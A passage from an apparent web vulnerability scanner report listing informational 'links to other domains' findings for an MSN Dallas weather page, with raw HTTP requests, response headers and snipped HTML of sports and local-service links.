<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71872">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71872">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71922" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71922">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Utah-75-TCU-62-52354638">Utah 75, TCU 62</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-9-BYU-83-TCU-67-33157554">No. 9 BYU 83, TCU 67</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Colorado-St-79-TCU-69-99128904">Colorado St. 79, TCU 69</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/TCU-78-Wyoming-60-47712021">TCU 78, Wyoming 60</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71922">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71922">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="SMU Mustangs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/515.gif" alt="SMU Mustangs - Women logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/wcbk">SMU Mustangs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="TCU Horned Frogs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">TCU Horned Frogs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/No-20-TCU-78-Colorado-St-51-34049731">No. 20 TCU 78, Colorado St. 51</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-23-TCU-81-UNLV-61-58963977">No. 23 TCU 81, UNLV 61</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-22-TCU-80-San-Diego-St-63-56753002">No. 22 TCU 80, San Diego St. 63</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Wyoming-73-No-22-TCU-67-02071027">Wyoming 73, No. 22 TCU 67</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Longhorns - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/585.gif" alt="Texas Longhorns - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Longhorns - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders3">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/CONNECTICUT-370-61746829">CONNECTICUT (38-0)</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Nebraskas-Yori-chosen-AP-coach-of-the-year-90044251">Nebraska's Yori chosen AP coach of the year</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylor-Lady-Bears-Roster-34247840">Baylor Lady Bears Roster</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Tech Red Raiders - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Tech Red Raiders - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-Championship-Winningest-Coaches-87055644">Women's NCAA Championship Winningest Coaches</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Fewest-Points-in-One-Half-NCAA-Tournament-07292331">Fewest Points in One Half - NCAA Tournament</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-AllTournament-Teams-37687435">Women's NCAA All-Tournament Teams</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/OKLAHOMA-2710-68082171">OKLAHOMA (27-10)</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Baylor Bears - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/50.gif" alt="Baylor Bears - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Baylor Bears - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Womens-Final-Four-MVPs-25159731">NCAA Women's Final Four MVPs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Championship-Scores-81750110">NCAA Championship Scores</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylors-future-bright-for-Griner-young-Bears-60468229">Baylor's future bright for Griner, young Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba" title="San Antonio Silver Stars"><img src="http://msn.foxsports.com/fe/img/WNBA/TeamLogo/Large/8.gif" alt="San Antonio Silver Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wnba">San Antonio Silver Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/story/Leuchanka-leads-Belarus-to-7053-upset-of-Russia-67166762">Leuchanka leads Belarus to 70-53 upset of Russia</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/USA-aims-to-reclaim-gold-at-womens-hoops-worlds-21153241">USA aiming for gold at women's basketball worlds</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/Mercury-92-Silver-Stars-73-19788864">Mercury 92, Silver Stars 73</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wnba/story/Silver-Stars-92%2C-Mercury-91">Phoenix tops San Antonio 92-73 in WNBA playoffs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wnba/stats">Stats</a></li><li><a href="http://msn.foxsports.com/wnba/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wnba">WNBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/houston-astros" title="Houston Astros"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/18.gif" alt="Houston Astros logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/houston-astros">Houston Astros</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Houston-Astros-reach-34M-3-year-deal-with-RHP-Wandy-Rodriguez-012511">Astros, Rodriguez reach 3-year deal</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Astros-pitcher-Carrillo-arrested-at-Fla-casino-03199288">Astros pitcher Carrillo arrested at Fla. casino</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List">Salary Arbitration Eligibles List</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608">Astros infielder Keppinger to have foot surgery</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/texas-rangers" title="Texas Rangers"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/13.gif" alt="Texas Rangers logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/texas-rangers">Texas Rangers</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420">Rangers, Napoli avoid arbitration with $5.8M deal</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116">Orioles hope to add Guerrero to revamped roster</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Padres-promote-Chris-Gwynn%2C-hire-Dave-Roberts">Padres reach deals with INF Cantu, RHP Burke</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Rangers-trade-Francisco-to-Blue-Jays-for-Napoli-03177108">Rangers trade Francisco to Blue Jays for Napoli</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377" title="FC Dallas"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5357.gif" alt="FC Dallas logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">FC Dallas</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382" title="Houston Dynamo"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5726.gif" alt="Houston Dynamo logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Houston Dynamo</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/team/dallas-stars" title="Dallas Stars"><img src="http://msn.foxsports.com/fe/img/NHL/TeamLogo/Large/9.png" alt="Dallas Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nhl/team/dallas-stars">Dallas Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/story/Stars-3-Oilers-1-38835353">Stars 3, Oilers 1</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/Dallas-Stars-Jamie-Benn-Tom-Wandell-out-with-upper-body-injuries-012611">Stars' Benn, Wandell out</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/OilersStars-Preview-96456130">Oilers-Stars Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nhl/story/Vancouver-Canucks-beat-Dallas-Stars-NHL-012411">Canucks score three in first five shots</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/stats/">Stats</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/schedule/">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;f538503&quot;]&amp;form=MSNLAP">NFL Experience</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162394705&quot;]&amp;form=MSNLAP">2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162393185&quot;]&amp;form=MSNLAP">2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z155484965&quot;]&amp;form=MSNLAP">Everything's Bigger in Texas Party DUEX Super Celebrity Party</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z157228725&quot;]&amp;form=MSNLAP">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=MhTrwKXH&amp;resize=false">Feedback</a>
...[SNIP]...

22.127. http://local.redacted/ten-day.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /ten-day.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ten-day.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:50 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=afb8b9492c2b42c7879e045551434b33; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=14A5988DFFB34236AF6BEEC4898E91BC; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:50 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344870&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Ften-day.aspx%3Fq%3DDallas-TX%26zip%3D75201&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&amp;mkt=en-us&amp;FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&amp;unit=F&amp;Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/forecast?q=Dallas, Texas weather&amp;unit=F&amp;Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&amp;resize=false">Feedback</a>
...[SNIP]...

22.128. http://local.redacted/ten-day.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /ten-day.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ten-day.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=402c2913a26444f0a8fab0deddb0fe46; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4F74CB36139F4EDB8419292CFC7F0273; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406239&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Ften-day.aspx%3Fq%3DDallas-TX%26zip%3D75201&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&amp;unit=F&amp;Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/forecast?q=Dallas, Texas weather&amp;unit=F&amp;Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&amp;resize=false">Feedback</a>
...[SNIP]...

22.129. http://local.redacted/weather.aspx

Summary

Severity:   Information
Confidence:   Certain
